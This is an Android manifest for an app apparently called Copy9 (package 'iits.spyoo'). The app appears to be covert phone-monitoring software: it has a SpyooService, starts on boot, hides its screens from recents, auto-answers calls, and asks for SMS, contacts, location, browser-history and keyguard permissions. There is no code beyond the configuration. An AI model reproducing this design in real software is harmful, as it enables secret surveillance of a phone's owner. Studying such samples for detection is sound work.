<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="iits.spyoo">
    <application android:debuggable="true" android:icon="@drawable/icon" android:label="Copy9">
        <activity android:excludeFromRecents="true" android:label="@string/app_name" android:name=".Program" android:noHistory="true" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
        <activity android:excludeFromRecents="true" android:label="@string/login_title" android:name=".Login" android:noHistory="true"/>
        <activity android:excludeFromRecents="true" android:label="@string/setting_title" android:name=".Setting" android:noHistory="true"/>
        <activity android:excludeFromRecents="true" android:label="" android:name=".AutoRun" android:noHistory="true"/>
        <activity android:excludeFromRecents="true" android:label="@string/about_title" android:name=".About" android:noHistory="true" android:screenOrientation="portrait"/>
        <activity android:excludeFromRecents="true" android:label="" android:name=".AutoAnswerScreen" android:noHistory="true"/>
        <receiver android:name="iits.receiver.AutoRunReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.HOME"/>
            </intent-filter>
        </receiver>
        <receiver android:name="iits.receiver.DateTimeReceiver">
            <intent-filter>
                <action android:name="android.intent.action.TIME_SET"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
            </intent-filter>
        </receiver>
        <receiver android:name="iits.receiver.LoginReceiver">
            <intent-filter>
                <action android:name="android.intent.extra.DATA_REMOVED"/>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
                <category android:name="android.intent.category.DEFAULT"/>
            </intent-filter>
        </receiver>
        <receiver android:name="iits.receiver.AutoAnswerReceiver">
            <intent-filter>
                <action android:name="android.intent.action.PHONE_STATE"/>
            </intent-filter>
        </receiver>
        <service android:name="iits.service.SpyooService" android:process=":remote">
            <intent-filter>
                <action android:name="iits.service.SpyooService"/>
            </intent-filter>
        </service>
        <service android:name="iits.service.ResetService" android:process=":remote">
            <intent-filter>
                <action android:name="iits.service.ResetService"/>
            </intent-filter>
        </service>
        <service android:name="iits.service.AutoAnswerIntentService" android:process=":remote">
            <intent-filter>
                <action android:name="iits.service.AutoAnswerIntentService"/>
            </intent-filter>
        </service>
    </application>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS"/>
</manifest>
